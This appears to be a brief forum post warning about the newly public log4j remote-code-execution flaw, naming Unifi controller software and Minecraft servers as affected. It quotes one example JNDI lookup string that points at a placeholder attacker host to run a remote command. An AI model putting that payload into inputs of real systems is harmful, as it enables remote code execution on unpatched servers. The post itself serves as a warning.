There is a nasty zero day exploit that was just made public around a certain Java logging application called "log4j" - see some details here: https://sysdig.com/blog/cve-critical-vulnerability-log4j/

One thing I know for sure that's affected is the Unifi controller software (there is a patch available). Apparently it really sucks for Minecraft servers too.

A bad actor can supposedly run any code they want simply by sending ${jndi:ldap://BADHOST.COM:PORT/RemoteCommand}

Ug. bash


[Linked Image from web.atcomsystems.ca]
Looking for a VoIP Phone Canada provider? Put Atcom's valuable VoIP expertise to work for your business today!